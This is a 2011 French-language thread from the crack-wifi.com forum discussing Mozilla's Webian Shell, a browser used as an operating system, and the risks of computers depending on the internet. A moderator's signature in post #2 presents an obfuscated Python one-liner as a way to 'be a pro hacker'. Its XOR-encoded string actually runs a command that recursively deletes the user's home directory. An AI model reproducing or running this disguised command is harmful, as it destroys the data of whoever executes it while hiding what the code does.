Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 10-06-2011 01:26:03

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Webian shell (futur Chrome OS libre?)

plop les loulous,

Il est apparemment à la mode de penser qu'un navigateur peut faire office de système d'exploitation.

Après Chrome OS de Google et le projet Chromless de Mozilla voila que ces derniers dévoilent un nouveau projet nommé Webian Shell.

Il s'agit d'un navigateur en mode plein écran orienté web déstiné aux amateurs de systèmes légérs qui pourrait à terme se transformer en un projet identique à Chrome OS.

Un premier prototype est de sortie, pour en savoir plus, voila la page du projet et l'article clubic.

Il est possible de tester la bête sous GNU/linux, Windows et Max OS X.
Page de téléchargement

Ce que je trouve bien dans l'histoire est que si ce projet abouti, Google ne monopolisera pas ce secteur.
Je trouve cela plus rassurant, d'autant plus que c'est un projet "libre".

A suivre ...

[source] clubic.com

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 10-06-2011 08:18:23

spawn
Modérateur

Re : Webian shell (futur Chrome OS libre?)

Mouais.
Ça risque fort d'associer ordinateur à Internet chez le grand public.
À voir.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 10-06-2011 20:51:51

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Re : Webian shell (futur Chrome OS libre?)

Je pense que de toute façon un pc sans internet ne leur servira pas grand chose, ils vont vite s'ennuyer.
Je pense également que c'est déjà le cas en pratique.
Le pc n'est pas le seul exemple, les smarts phones, ardoises sont déjà associés à internet.
Je pense que dans un futur proche les appartements seront tous connectés d'office, avec un paiement inclut dans les charges et internet accessible à tous et partout via le wifi.

Mais tu as  1000 fois raison de soulever le problème.
Ce qui peut paraitre une bonne chose à première vue, peut aussi s'avérer inégalitaire.

Si les consommateurs associent le pc à internet il y a de grandes chances que les développeurs travaillent alors en ce sens.
Et tous les pays et les citoyens ne sont pas égaux en terme d'infrastructure, de débit, de matériel et de moyens.
Cela pourrait en exclure pas mal si cette méthode venait à se généraliser.

Cela dit on en est pas encore la et je pense qu'ils seront assez intelligents pour s'en rendre compte.

Mais il faut rester vigilant, car le risque est réel en effet.
L'ampleur que prend le could n'est pas négligeable.
La combinaison des deux si elle se généralise peux priver pas mal de gens de pas mal de choses faute de moyens.

Un autre problème peut se poser dans un tel cas, l'information est plus facile à censurer pour un état totalitaire si le système d'exploitation est dépendant d'internet.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.022 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]